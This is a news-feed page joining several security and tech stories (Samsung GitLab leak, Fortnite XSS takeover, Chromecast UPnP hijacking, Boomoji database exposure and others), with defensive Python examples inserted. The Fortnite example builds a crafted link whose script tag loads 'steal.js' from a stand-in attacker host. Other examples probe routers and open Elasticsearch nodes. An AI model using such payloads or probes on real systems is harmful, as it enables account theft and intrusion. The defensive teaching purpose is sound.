spokesperson

Samsung spilled SmartThings app source code and secret keys

A development lab used by Samsung engineers was leaking highly sensitive source code, credentials and secret keys for several internal projects — including its SmartThings platform, a security researcher found.

The electronics giant left dozens of internal coding projects on a GitLab instance hosted on a Samsung-owned domain, Vandev Lab. The instance, used by staff to share and contribute code to various Samsung apps, services and projects, was spilling data because the projects were set to “public” and not protected with a password, so anyone could look inside each project and access and download the source code.

Mossab Hussein, a security researcher at Dubai-based cybersecurity firm SpiderSilk who discovered the exposed files, said one project contained credentials that allowed access to the entire AWS account that was being used, including more than 100 S3 storage buckets that contained logs and analytics data.

Many of the folders, he said, contained logs and analytics data for Samsung’s SmartThings and Bixby services, but the buckets also held several employees’ private GitLab tokens stored in plaintext. Those tokens expanded his access from the 42 public projects to 135 projects, including many private ones.
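A check a practitioner would run on any such instance before an outsider does: scan repository contents for credential shapes. The scanner below is an added example written for this page, not Samsung’s or SpiderSilk’s code. The sample files, paths and the gitlab.example host are constructed; the AWS values are the placeholder keys from AWS’s own documentation. The glpat- prefix is the one GitLab has attached to personal access tokens since 2021, which postdates the tokens in this story, so older unprefixed tokens are caught only by the entropy rule.

```python
"""Scan repository contents for leaked cloud and GitLab credentials.

Added example for this article; it is not Samsung's or SpiderSilk's code and the
sample files are constructed. The AKIA/ASIA prefix of AWS access key IDs is a
documented format. The glpat- prefix is what GitLab puts on personal access
tokens today; older tokens had no prefix, so the scanner also flags any long,
high-entropy value assigned to a name containing words like secret or token.
"""
import math
import re
from collections import Counter

# Credential shapes that can be matched directly.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "gitlab_pat": re.compile(r"\bglpat-[0-9A-Za-z_\-]{20,}\b"),
}

# name = value, where the name suggests a secret and the value is long enough to be one.
CONTEXT = re.compile(
    r"(?i)\b([A-Z0-9_]*(?:secret|token|private_key|password|passwd|api_key)[A-Z0-9_]*)"
    r"\s*[:=]\s*['\"]?([A-Za-z0-9+/_\-]{20,})"
)


def shannon_entropy(s: str) -> float:
    """Bits per character: random base64 scores about 4.5 to 5, English prose 3 to 4."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def _finding(path, lineno, kind, name, value):
    # Mask the value so the scanner's report does not become a second copy of the leak.
    masked = value[:4] + "..." + value[-4:]
    return {"path": path, "line": lineno, "kind": kind, "name": name, "value": masked}


def scan_text(text: str, path: str = "<memory>", min_entropy: float = 4.0):
    """Return findings for one file's contents, in line order."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in PATTERNS.items():
            for m in pattern.finditer(line):
                findings.append(_finding(path, lineno, kind, "", m.group(0)))
        for m in CONTEXT.finditer(line):
            name, value = m.group(1), m.group(2)
            already = any(p.search(value) for p in PATTERNS.values())
            if not already and shannon_entropy(value) >= min_entropy:
                findings.append(_finding(path, lineno, "high_entropy_secret", name, value))
    return findings


def scan_files(files: dict):
    """files maps path -> contents; findings come back sorted by path and line."""
    out = []
    for path, text in files.items():
        out.extend(scan_text(text, path))
    return sorted(out, key=lambda f: (f["path"], f["line"]))


# Constructed contents standing in for a leaked project. The AWS values are the
# documentation placeholders from AWS's own examples, not live keys.
SAMPLE_FILES = {
    "config/aws.env": (
        "AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\n"
        "AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n"
    ),
    "scripts/ci.sh": (
        "#!/bin/sh\n"
        "# constructed: a personal token checked into a build script\n"
        "GITLAB_TOKEN=glpat-xQ7vK2mN9pL4rT8wY3zB\n"
        'curl -H "PRIVATE-TOKEN: $GITLAB_TOKEN" https://gitlab.example/api/v4/projects\n'
    ),
    "README.md": "Set password = hunter2 for the local test account.\n",
}

if __name__ == "__main__":
    for f in scan_files(SAMPLE_FILES):
        print(f"{f['path']}:{f['line']} {f['kind']} {f['name']} {f['value']}")
```

Run it in CI on every push, or over a clone of each project the GitLab API reports as public. Findings are masked so the report itself can be shared without becoming a second leak.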

Samsung told him some of the files were for testing but Hussein challenged the claim, saying source code found in the GitLab repository contained the same code as the Android app, published in Google Play on April 10.

The app, which has since been updated, has more than 100 million installs to date.

“I had the private token of a user who had full access to all 135 projects on that GitLab,” he said, which could have allowed him to make code changes using a staffer’s own account.

Hussein shared several screenshots and a video of his findings for TechCrunch to examine and verify.

The exposed GitLab instance also contained private certificates for the SmartThings iOS and Android apps.

Hussein also found several internal documents and slideshows among the exposed files.

“The real threat lies in the possibility of someone acquiring this level of access to the application source code, and injecting it with malicious code without the company knowing,” he said.

Through exposed private keys and tokens, Hussein documented a vast amount of access that if obtained by a malicious actor could have been “disastrous,” he said.

A screenshot of the exposed AWS credentials, allowing access to buckets with GitLab private tokens (Image: supplied)

Hussein, a white-hat hacker and data breach discoverer, reported the findings to Samsung on April 10. In the days following, Samsung began revoking the AWS credentials, but it’s not known if the remaining secret keys and certificates were revoked.

Samsung still hasn’t closed the case on Hussein’s vulnerability report, close to a month after he first disclosed the issue.

“Recently, an individual security researcher reported a vulnerability through our security rewards program regarding one of our testing platforms,” Samsung spokesperson Zach Dugan told TechCrunch when reached prior to publication. “We quickly revoked all keys and certificates for the reported testing platform and while we have yet to find evidence that any external access occurred, we are currently investigating this further.”

Hussein said Samsung took until April 30 to revoke the GitLab private keys. Samsung also declined to answer specific questions we had and provided no evidence that the Samsung-owned development environment was for testing.

Hussein is no stranger to reporting security vulnerabilities. He recently disclosed a vulnerable back-end database at Blind, an anonymous social networking site popular among Silicon Valley employees — and found a server leaking a rolling list of user passwords for scientific journal giant Elsevier.

Samsung’s data leak, he said, was his biggest find to date.

“I haven’t seen a company this big handle their infrastructure using weird practices like that,” he said.

Powered by WPeMatico

Selfie app maker Meitu eyes overseas gaming market with $340 million deal

China’s largest selfie app maker Meitu has been busy working to diversify itself beyond the beauty arena in China. On Wednesday, the Hong Kong-listed company announced in a filing that it has agreed to pay about HK$2.7 billion ($340 million) for a 31 percent stake in game publishing company Dreamscape Horizon.

Dreamscape Horizon, a subsidiary of Hong Kong-listed games group Leyou, specializes in making video games for personal computers and consoles, and owns 97 percent of Canada-based studio Digital Extremes. This global connection could hasten Meitu’s overseas expansion, while the foray into games should help the Xiamen-based firm capture more male users. (Operating out of Xiamen might also have made it convenient for Meitu to tap the coastal city’s booming hub of game developers.) Out of Meitu’s 110 million monthly active users overseas, only 30 million are male.

“The collaboration with Leyou is not only focused on mainland China but also the global market,” says a Meitu spokesperson in a statement. “Mainland China currently accounts for the majority of Meitu’s earnings. The acquisition will broaden our business scope and diversify the geographic streams of our income.”

The overseas move appears to be a tactical one, as the domestic gaming market is crowded with established players like Tencent, NetEase and hundreds of smaller contenders. The local environment has also turned hostile to gaming companies as Beijing steps up scrutiny amid concerns that titles are violent and harmful to young players. The result was a months-long halt in game approvals that dragged down Tencent’s stock price and prompted a major reshuffle at the giant. Before long, Tencent announced it would deepen its ties with Garena to distribute games in Southeast Asia. The hiatus ended in December, but companies are still feeling the chill as China is reportedly mulling a further pause this week.

Meitu is most famous for its suite of photo-editing and beautifying apps, but hardware has been its major income source for years. For the first half of 2018, the company generated 72 percent of its revenues from selling smartphones optimized for taking selfies, a category that has proven popular in a country where touched-up photos have become the norm. But Meitu’s hardware business is shrinking as smartphone shipments slow in China and phones from mainstream brands like Xiaomi and Huawei now come equipped with filters. It has, however, found a new home for its barely mainstream smartphone brand after Xiaomi gobbled it up in November to lure more female users.

Lenovo Watch X was riddled with security bugs, researcher says

Lenovo’s Watch X was widely panned as “absolutely terrible.” As it turns out, so was its security.

The $50 Watch X was one of Lenovo’s cheapest smartwatches. Sold only in China, it has to be bought directly from the mainland. Luckily, Erez Yalon, head of security research at application security testing company Checkmarx, was given one by a friend. It didn’t take him long to find several vulnerabilities that allowed him to change users’ passwords, hijack accounts and spoof phone calls.

Because the smartwatch wasn’t using any encryption to send data from the app to the server, Yalon said he was able to see his registered email address and password sent in plain text, as well as data about how he was using the watch, like how many steps he was taking.

“The entire API was unencrypted,” said Yalon in an email to TechCrunch. “All data was transferred in plain-text.”

The API that helps power the watch was easily abused, he found, allowing him to reset anyone’s password simply by knowing a person’s username. That could’ve given him access to anyone’s account, he said.

Not only that, he found that the watch was sharing his precise geolocation with a server in China. Given that the watch is sold only in China, that might not be a red flag to users there. But Yalon said the watch had “already pinpointed my location” before he had even registered his account.

Yalon’s research wasn’t just limited to the leaky API. He found that the Bluetooth-enabled smartwatch could also be manipulated from nearby, by sending crafted Bluetooth requests. Using a small script, he demonstrated how easy it was to spoof a phone call on the watch.

Using a similar malicious Bluetooth command, he could also set the alarm to go off — again and again. “The function allows adding multiple alarms, as often as every minute,” he said.

Lenovo didn’t have much to say about the vulnerabilities, besides confirming their existence.

“The Watch X was designed for the China market and is only available from Lenovo to limited sales channels in China,” said spokesperson Andrew Barron. “Our [security] team has been working with the [original device manufacturer] that makes the watch to address the vulnerabilities identified by a researcher and all fixes are due to be completed this week.”

Yalon said that encrypting the traffic between the watch, the Android app and its web server would prevent snooping and help reduce manipulation.

“Fixing the API permissions eliminates the ability of malicious users to send commands to the watch, spoof calls, and set alarms,” he said.

Fortnite bugs put accounts at risk of takeover

With one click, any semi-skilled hacker could have silently taken over a Fortnite account, according to a cybersecurity firm that says the bug is now fixed.

Researchers at Check Point say the three vulnerabilities chained together could have affected any of its 200 million players. The flaws, if exploited, would have stolen the account access token set on the gamer’s device once they entered their password.

Once stolen, that token could be used to impersonate the gamer and log in as if they were the account holder, without needing their password.

The researchers say that the flaw lies in how Epic Games, the maker of Fortnite, handles login requests. Researchers said they could send any user a crafted link that appears to come from Epic Games’ own domain and steal an access token needed to break into an account.

Check Point’s Oded Vanunu explains how the bug works. (Image: supplied)

“It’s important to remember that the URL is coming from an Epic Games domain, so it’s transparent to the user and any security filter will not suspect anything,” said Oded Vanunu, Check Point’s head of products vulnerability research, in an email to TechCrunch.

Here’s how it works: the user clicks a link that points to an epicgames.com subdomain. By exploiting a cross-site scripting weakness in that subdomain, the attacker has arranged for the page to load malicious code from a server they control. Once the malicious script loads, unbeknownst to the Fortnite player, it steals their account token and sends it back to the attacker.

“If the victim user is not logged into the game, he or she would have to log in first,” said Vanunu. “Once that person is logged in, the account can be stolen.”
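The three conditions that have to hold for the chain above to work, as an added example written for this page rather than Epic Games’ or Check Point’s code: the trusted page reflects attacker input into its HTML, nothing restricts where script may load from, and the token is reachable from script. The hosts, the msg parameter, the cookie name, and whether the real token lived in a cookie at all, are assumptions.

```python
"""Reflected-parameter page, vulnerable and hardened, with a small audit.

Added example for this article; it is not Epic Games' or Check Point's code and
does not reproduce the actual Fortnite chain. It models the mechanism described
above in the abstract: a page on a trusted subdomain reflects a query parameter
into its HTML, so a crafted link makes the victim's browser load script from the
attacker's host. The origins, the 'msg' parameter and the 'access_token' cookie
name are assumptions; whether the real token lived in a cookie is not known.
"""
import html
import re
from urllib.parse import parse_qs, quote, urlsplit

PAGE_ORIGIN = "https://sub.epicgames.example"   # assumed stand-in for the subdomain
ATTACKER_ORIGIN = "https://attacker.example"     # assumed
STEAL_TAG = f'<script src="{ATTACKER_ORIGIN}/steal.js"></script>'
# The link the victim clicks: same trusted host, payload hidden in the query string.
CRAFTED_LINK = f"{PAGE_ORIGIN}/page?msg={quote(STEAL_TAG, safe='')}"


def _reflected(url: str) -> str:
    return parse_qs(urlsplit(url).query).get("msg", [""])[0]


def render_vulnerable(url: str) -> dict:
    """Reflects the parameter verbatim; no CSP; token cookie readable from script."""
    return {
        "headers": {"Set-Cookie": "access_token=REDACTED; Secure"},
        "body": f"<html><body><p>{_reflected(url)}</p></body></html>",
    }


def render_hardened(url: str) -> dict:
    """Escapes output, restricts script sources, and hides the token from script."""
    return {
        "headers": {
            "Content-Security-Policy": "default-src 'self'; script-src 'self'; "
                                       "object-src 'none'; base-uri 'none'",
            "Set-Cookie": "access_token=REDACTED; Secure; HttpOnly; SameSite=Lax",
            "X-Content-Type-Options": "nosniff",
        },
        "body": f"<html><body><p>{html.escape(_reflected(url), quote=True)}</p></body></html>",
    }


def parse_csp(header: str) -> dict:
    """'default-src 'self'; script-src a b' -> {'default-src': ["'self'"], 'script-src': ['a', 'b']}"""
    directives = {}
    for part in header.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    return directives


def script_src_allowed(csp_header: str, script_origin: str, page_origin: str) -> bool:
    """Simplified CSP source matching: exact origins, 'self', scheme sources and '*'.
    Host wildcards (*.example), nonces and hashes are not modelled."""
    directives = parse_csp(csp_header)
    sources = directives.get("script-src", directives.get("default-src"))
    if sources is None:
        return True                      # no policy at all: anything loads
    for src in sources:
        if src == "*":
            return True
        if src == "'self'" and script_origin == page_origin:
            return True
        if src.endswith(":") and script_origin.startswith(src):   # e.g. https:
            return True
        if src.lower() == script_origin.lower():
            return True
    return False


def audit(response: dict, page_origin=PAGE_ORIGIN, attacker_origin=ATTACKER_ORIGIN):
    """List the conditions that, together, let the attacker's script read the token."""
    issues = []
    headers = response["headers"]
    if re.search(r"<script\b", response["body"], re.I):
        issues.append("reflected script tag in body")
    if script_src_allowed(headers.get("Content-Security-Policy", ""), attacker_origin, page_origin):
        issues.append("CSP allows script from " + attacker_origin)
    if "httponly" not in headers.get("Set-Cookie", "").lower():
        issues.append("token cookie readable by script")
    return issues


if __name__ == "__main__":
    print("vulnerable:", audit(render_vulnerable(CRAFTED_LINK)))
    print("hardened:  ", audit(render_hardened(CRAFTED_LINK)))
```

Any one of the three fixes breaks this particular chain, which is why the audit reports them separately: output encoding stops the injection, the CSP stops the foreign script even if another injection is found, and HttpOnly keeps the token out of reach of any script that does run.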

Epic Games has since fixed the vulnerability.

“We were made aware of the vulnerabilities and they were soon addressed,” said Nick Chester, a spokesperson for Epic Games. “We thank Check Point for bringing this to our attention.”

“As always, we encourage players to protect their accounts by not re-using passwords and using strong passwords, and not sharing account information with others,” he said.

When asked, Epic Games would not say if user data or accounts were compromised as a result of this vulnerability.

Hackers hijack thousands of Chromecasts to warn of latest security bug

Hackers have hijacked thousands of exposed Chromecast streaming devices to warn users of the latest security flaw to affect the device. But other security researchers say that the bug — if left unfixed — could be used for more disruptive attacks.

The culprits, known as Hacker Giraffe and J3ws3r, are the latest to figure out how to trick Google’s media streamer into playing any YouTube video they want, including custom-made videos. This time around, the hackers forced the affected Chromecasts to display a pop-up notice on the connected TV, warning the user that their misconfigured router is exposing their Chromecast and smart TV to hackers like themselves.

Not one to waste an opportunity, the hackers also ask that you subscribe to PewDiePie, an awful internet person with a popular YouTube following. (Hacker Giraffe is the same hacker who tricked thousands of exposed printers into printing support for PewDiePie.)

The bug, dubbed CastHack, exploits a weakness in both the Chromecast and the router it connects to. Some home routers have Universal Plug and Play (UPnP) enabled, a networking standard that lets devices on the local network ask the router to forward ports to them from the internet, and one that can be abused in many ways. Those forwarded ports make Chromecasts and other devices visible and reachable from anywhere on the internet.

As the two hackers say, disabling UPnP on the router should fix the problem.
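What “exposed via UPnP” looks like from inside the network, as an added example that is not the hackers’ tooling or Google’s code: the router’s UPnP IGD service will list every port mapping it has accepted if asked for them index by index. The control URL below is assumed (it normally comes from SSDP discovery and the device description), the router replies used for the offline self-test are constructed, and 8008 and 8443 are the Chromecast’s local HTTP and HTTPS ports, which is why those are the ones flagged.

```python
"""Walk a router's UPnP port-mapping table and flag entries that expose a Chromecast.

Added example for this article; not the hackers' CastHack tooling or Google's code.
It sends the GetGenericPortMappingEntry action of the UPnP WANIPConnection service
with increasing indexes until the router answers UPnP error 713
(SpecifiedArrayIndexInvalid), which marks the end of the table. CONTROL_URL is an
assumption (in practice it comes from SSDP discovery), the replies in the offline
self-test are constructed, and 8008/8443 are the Chromecast's local listening ports.
"""
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET

SERVICE = "urn:schemas-upnp-org:service:WANIPConnection:1"
CONTROL_URL = "http://192.168.1.1:5000/ctl/IPConn"   # assumed; obtain from the IGD description
SUSPICIOUS_PORTS = {8008, 8443}


def build_request(index: int):
    """Headers and body for GetGenericPortMappingEntry(index)."""
    body = (
        '<?xml version="1.0"?>'
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
        's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body>'
        f'<u:GetGenericPortMappingEntry xmlns:u="{SERVICE}">'
        f"<NewPortMappingIndex>{index}</NewPortMappingIndex>"
        "</u:GetGenericPortMappingEntry></s:Body></s:Envelope>"
    )
    headers = {"Content-Type": 'text/xml; charset="utf-8"',
               "SOAPAction": f'"{SERVICE}#GetGenericPortMappingEntry"'}
    return headers, body.encode()


def parse_response(xml_bytes: bytes):
    """One mapping as a dict, or None when the index is past the end of the table (713)."""
    root = ET.fromstring(xml_bytes)
    code = root.find(".//{urn:schemas-upnp-org:control-1-0}errorCode")
    if code is not None:
        if code.text.strip() == "713":
            return None
        raise RuntimeError("UPnP error " + code.text.strip())
    entry = root.find(f".//{{{SERVICE}}}GetGenericPortMappingEntryResponse")
    fields = {child.tag: (child.text or "").strip() for child in entry}
    return {"external_port": int(fields["NewExternalPort"]), "protocol": fields["NewProtocol"],
            "internal_client": fields["NewInternalClient"], "internal_port": int(fields["NewInternalPort"]),
            "description": fields.get("NewPortMappingDescription", "")}


def http_post(url, headers, body):
    """Real transport. SOAP faults arrive as HTTP 500 with an XML body, so keep that body."""
    req = urllib.request.Request(url, data=body, headers=headers, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.read()
    except urllib.error.HTTPError as err:
        return err.read()


def list_mappings(post=http_post, control_url=CONTROL_URL, limit=1000):
    """Enumerate mappings index by index; stop at the first 713."""
    mappings = []
    for index in range(limit):
        headers, body = build_request(index)
        entry = parse_response(post(control_url, headers, body))
        if entry is None:
            break
        mappings.append(entry)
    return mappings


def flag_exposed(mappings):
    """Mappings that put a Chromecast port on the internet."""
    return [m for m in mappings
            if m["internal_port"] in SUSPICIOUS_PORTS or m["external_port"] in SUSPICIOUS_PORTS]


# --- constructed router replies for an offline run ---------------------------------
def _mapping_reply(ext, proto, client, internal, desc):
    return ('<?xml version="1.0"?>'
            '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>'
            f'<u:GetGenericPortMappingEntryResponse xmlns:u="{SERVICE}">'
            f"<NewRemoteHost></NewRemoteHost><NewExternalPort>{ext}</NewExternalPort>"
            f"<NewProtocol>{proto}</NewProtocol><NewInternalPort>{internal}</NewInternalPort>"
            f"<NewInternalClient>{client}</NewInternalClient><NewEnabled>1</NewEnabled>"
            f"<NewPortMappingDescription>{desc}</NewPortMappingDescription>"
            "<NewLeaseDuration>0</NewLeaseDuration>"
            "</u:GetGenericPortMappingEntryResponse></s:Body></s:Envelope>").encode()


FAULT_713 = ('<?xml version="1.0"?>'
             '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault>'
             "<faultcode>s:Client</faultcode><faultstring>UPnPError</faultstring><detail>"
             '<UPnPError xmlns="urn:schemas-upnp-org:control-1-0"><errorCode>713</errorCode>'
             "<errorDescription>SpecifiedArrayIndexInvalid</errorDescription></UPnPError>"
             "</detail></s:Fault></s:Body></s:Envelope>").encode()

SAMPLE_TABLE = [_mapping_reply(8008, "TCP", "192.168.1.23", 8008, "Chromecast"),
                _mapping_reply(51413, "TCP", "192.168.1.40", 51413, "torrent client")]


def fake_post(url, headers, body):
    """Stand-in for http_post: answers by index from SAMPLE_TABLE, then faults with 713."""
    index = int(ET.fromstring(body).find(".//NewPortMappingIndex").text)
    return SAMPLE_TABLE[index] if index < len(SAMPLE_TABLE) else FAULT_713


if __name__ == "__main__":
    for m in flag_exposed(list_mappings(post=fake_post)):
        print(f"{m['protocol']} {m['external_port']} -> {m['internal_client']}:{m['internal_port']}")
```

Against a real router, pass `post=http_post` (the default) and the control URL taken from the IGD description document; anything this lists is reachable from the internet whether or not the owner remembers opening it.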

“We have received reports from users who have had an unauthorized video played on their TVs via a Chromecast device,” a Google spokesperson told TechCrunch. “This is not an issue with Chromecast specifically, but is rather the result of router settings that make smart devices, including Chromecast, publicly reachable,” the spokesperson said.

That’s true on one hand, but it doesn’t address the underlying issue — that the Chromecast can be tricked into allowing an unauthenticated attacker the ability to hijack a media stream and display whatever they want.

Hacker Giraffe sent this YouTube video to thousands of exposed Chromecast devices, warning that their streams could be easily hijacked. (Screenshot: TechCrunch)

Bishop Fox, a security consultancy, first found a hijack bug in 2014, not long after the Chromecast debuted. The researchers found that they could conduct a “deauth” attack that disconnects the Chromecast from the Wi-Fi network it was connected to, causing it to revert to its out-of-the-box state, waiting for a device to tell it where to connect and what to stream. That’s when it can be hijacked and forced to stream whatever the hijacker wants. All of this can be done in an instant, as they demonstrated, with the touch of a button on a custom-built handheld remote.

Two years later, U.K. cybersecurity firm Pen Test Partners discovered that the Chromecast was still vulnerable to “deauth” attacks, making it easy to play content on a neighbor’s Chromecasts in just a few minutes.

Ken Munro, who founded Pen Test Partners, says there’s “no surprise that somebody else stumbled on to it,” given that Bishop Fox found it in 2014 and his own company confirmed it in 2016.

“In fairness, we never thought that the service would be exposed on the public internet, so that is a very valid finding of his, full credit to him for that,” Munro told TechCrunch. (Google said in a follow-up email that it’s working to fix the deauth bug.)

He said the way the attacks are delivered differs, but the method of exploitation is the same: CastHack can be exploited over the internet, while the Bishop Fox and Pen Test Partners “deauth” attacks have to be carried out within range of the Wi-Fi network. Both let the attacker control what the Chromecast displays on the TV, he said.

Munro said Google should have fixed its bug in 2014 when it first had the chance.

“Allowing control over a local network without authentication is a really silly idea on [Google’s] part,” he said. “Because users do silly things, like expose their TVs on the internet, and hackers find bugs in services that can be exploited.”

But Munro said that these kinds of attacks — although obnoxious and intrusive on the face of it — could be exploited to have far more malicious consequences.

In a blog post Wednesday, Munro said it was easy to exploit other smart home devices — like an Amazon Echo — by hijacking a Chromecast and forcing it to play commands that are loud enough to be picked up by its microphone. That’s happened before, when smart assistants get confused when they overhear words on the television or radio, and suddenly and without warning purchase items from Amazon. (You can and should turn on a PIN for ordering through Amazon.)

To name a few, Munro said it’s possible to force a Chromecast into loading a YouTube video created by an attacker to trick an Echo to: “Alexa, order an iPad,” or, “Alexa, turn off the house alarm,” or, “Alexa, set an alarm every day at 3am.”

Amazon Echos and other smart devices are widely considered to be secure, even if they’re prone to overhearing things they shouldn’t. Often, the weakest link is humans. Second to that, it’s the other devices around smart home assistants that pose the biggest risk, said Munro in his blog post. That was demonstrated recently when Canadian security researcher Render Man showed how using a sound transducer against a window can trick a nearby Amazon Echo into unlocking a network-connected smart lock on the front door of a house.

“Google needs to properly fix the Chromecast deauth bug that allows casting of YouTube traffic,” said Munro.

Updated at 9pm ET: with a new, clearer headline to better reflect the flaws over the years, and added additional comment from Google.

Popular avatar app Boomoji exposed millions of users’ contact lists and location data

Popular animated avatar creator app Boomoji, with more than five million users across the world, exposed the personal data of its entire user base after it failed to put passwords on two of its internet-facing databases.

The China-based app developer left two ElasticSearch databases online without passwords: a U.S.-based database for its international customers, and a Hong Kong-based database containing mostly Chinese users’ data, kept there to comply with China’s data security laws, which require Chinese citizens’ data to be stored on servers inside the country.

Anyone who knew where to look could access, edit or delete the databases using their web browser. And because the databases were listed on Shodan, a search engine for exposed devices and databases, they were easily found with a few keywords.
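How “anyone who knew where to look” turns into a couple of requests, as an added example written for this page rather than Boomoji’s or TechCrunch’s code: two anonymous GETs tell you whether a node demands credentials and how much it holds. The host, index names and replies in the offline self-test are constructed; the severity thresholds are this example’s own choice.

```python
"""Probe an Elasticsearch node the way an anonymous browser visit would.

Added example for this article; it is not Boomoji's or TechCrunch's code. Two
GETs are enough: '/' tells you whether the node answers without credentials,
and '/_cat/indices?format=json' tells you how many documents each index holds.
The host name, index names and the JSON replies used for the offline self-test
are constructed; the severity thresholds are this example's own choice.
"""
import json
import urllib.error
import urllib.request


def fetch(url):
    """Real transport: returns (status, body) and keeps 401/403 bodies instead of raising."""
    try:
        with urllib.request.urlopen(url, timeout=5) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


def probe(base_url, get=fetch):
    base = base_url.rstrip("/")
    result = {"auth_required": None, "indices": [], "total_docs": 0}
    status, body = get(base + "/")
    if status in (401, 403):
        result["auth_required"] = True        # the node demands credentials
        return result
    if status != 200:
        raise RuntimeError(f"unexpected status {status} from {base}/")
    root = json.loads(body)
    if "cluster_name" not in root and "tagline" not in root:
        raise RuntimeError("root document does not look like Elasticsearch")
    result["auth_required"] = False
    status, body = get(base + "/_cat/indices?format=json")
    if status == 200:
        for idx in json.loads(body):
            if idx["index"].startswith("."):
                continue                      # internal indices such as .kibana
            docs = int(idx.get("docs.count") or 0)
            result["indices"].append({"name": idx["index"], "docs": docs, "size": idx.get("store.size")})
            result["total_docs"] += docs
    return result


def severity(result):
    """Rough triage: anonymous read access to millions of records is the worst case."""
    if result["auth_required"]:
        return "ok"
    if result["total_docs"] == 0:
        return "low"
    return "critical" if result["total_docs"] >= 1_000_000 else "high"


# --- constructed replies for an offline run ----------------------------------------
FAKE_HOST = "http://es.example:9200"
FAKE_REPLIES = {
    "/": (200, json.dumps({"name": "node-1", "cluster_name": "app-prod",
                           "version": {"number": "6.4.2"}, "tagline": "You Know, for Search"}).encode()),
    "/_cat/indices?format=json": (200, json.dumps([
        {"index": "users", "docs.count": "5300000", "store.size": "2.1gb"},
        {"index": "contacts", "docs.count": "125000000", "store.size": "9.8gb"},
        {"index": ".kibana", "docs.count": "3", "store.size": "12kb"},
    ]).encode()),
}


def fake_get_open(url):
    """An exposed node: answers everything without credentials."""
    return FAKE_REPLIES.get(url[len(FAKE_HOST):], (404, b""))


def fake_get_secured(url):
    """A node with authentication enabled: every anonymous request gets 401."""
    return 401, b'{"error":{"type":"security_exception","reason":"missing authentication credentials"}}'


if __name__ == "__main__":
    r = probe(FAKE_HOST, get=fake_get_open)
    print(severity(r), r["total_docs"], [i["name"] for i in r["indices"]])
```

A node that answers the root request with 200 and no credentials is already the finding; the index listing only sizes it. The same two requests are what an attacker issues after a Shodan hit, which is why binding the node to a private interface and enabling authentication both matter.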

After TechCrunch reached out, Boomoji pulled the two databases offline. “These two accounts were made by us for testing purposes,” said an unnamed Boomoji spokesperson in an email.

But that isn’t true.

The database contained records on all of the company’s iOS and Android users — some 5.3 million users as of this week. Each record contained their username, gender, country and phone type.

Each record also included a user’s unique Boomoji ID, which was linked to other tables in the database. Those other tables recorded whether, and which, school they attend, a feature Boomoji touts as a way for users to get in touch with their fellow students. That unique ID was also linked to the precise geolocation of more than 375,000 users who had allowed the app to know their location at any given time.

Worse, the database contained every phone book entry of every user who had allowed the app access to their contacts.

One table had more than 125 million contacts, including their names (as written in a user’s phone book) and their phone numbers. Each record was linked to a user’s unique Boomoji ID, making it relatively easy to know whose contact list belonged to whom.

Even if you didn’t use the app, anyone who has your phone number stored on their device and used the app more than likely uploaded your number to Boomoji’s database. To our knowledge, there’s no way to opt out or have your information deleted.

Given Boomoji’s response, we verified the contents of the database by downloading the app on a dedicated iPhone using a throwaway phone number, containing a few dummy, but easy-to-search contact list entries. To find friends, the app matches your contacts with those registered with the app in its database. When we were prompted to allow the app access to our contacts list, the entire dummy contact list was uploaded instantly — and viewable in the database.

So long as the app was installed and had access to the contacts, new phone numbers would be automatically uploaded.

None of the data was encrypted. All of it was stored in plaintext.

Although Boomoji is based in China, it claims to follow California state law, where data protection and privacy rules are some of the strongest in the U.S. We asked Boomoji if it has or plans to inform California’s attorney general of the exposure as required by state law, but the company did not answer.

Given the vast amount of European users’ information in the database, the company may also face penalties under the EU’s General Data Protection Regulation, which can impose fines of up to four percent of the company’s global annual revenue for serious breaches.

But given its China-based presence, it’s not clear what actionable repercussions the company could face.

This is the latest in a series of exposures involving ElasticSearch instances, a popular open source search and database software. In recent weeks, several high-profile data exposures have been reported as a result of companies’ failure to practice basic data security measures — including Urban Massage exposing its own customer database, Mindbody-owned FitMetrix forgetting to put a password on its servers and Voxox, a communications company, which leaked phone numbers and two-factor codes on millions of unsuspecting users.



Civil servant who watched porn at work blamed for infecting a US government network with malware

A U.S. government network was infected with malware thanks to one employee’s “extensive history” of watching porn on his work computer, investigators have found.

The audit, carried out by the U.S. Department of the Interior’s inspector general, found that a U.S. Geological Survey (USGS) network at the EROS Center, a satellite imaging facility in South Dakota, was infected after an unnamed employee visited thousands of porn pages that contained malware, which downloaded to his laptop and “exploited the USGS’ network.” Investigators found that many of the porn images were “subsequently saved to an unauthorized USB device and personal Android cell phone,” which was connected to the employee’s government-issued computer.

Investigators found that his Android cell phone “was also infected with malware.”

The findings were made public in a report earlier this month but buried on the U.S. government’s oversight website and went largely unreported.

It’s bad enough in this day and age that a government watchdog has to remind civil servants to not watch porn at work — let alone on their work laptop. The inspector general didn’t say what the employee’s fate was, but ripped into the Department of the Interior’s policies for letting him get that far in the first place.

“We identified two vulnerabilities in the USGS’ IT security posture: web-site access and open USB ports,” the report said.

There is a (slightly) bright side. The EROS Center, which monitors and archives images of the planet’s land surface, doesn’t operate any classified networks, a spokesperson for Interior’s inspector general told TechCrunch in an email, ruling out any significant harm to national security. But the spokesperson wouldn’t say what kind of malware was used, only that “the malware helps enable data exfiltration and is also associated with ransomware attacks.”

Investigators recommended that USGS enforce a “strong blacklist policy” of known unauthorized websites and “regularly monitor employee web usage history.”

The report also said the agency should lock down its USB drive policy, restricting employees from using removable media on government devices, but it’s not known if the recommendations have yet gone into place. USGS did not return a request for comment.
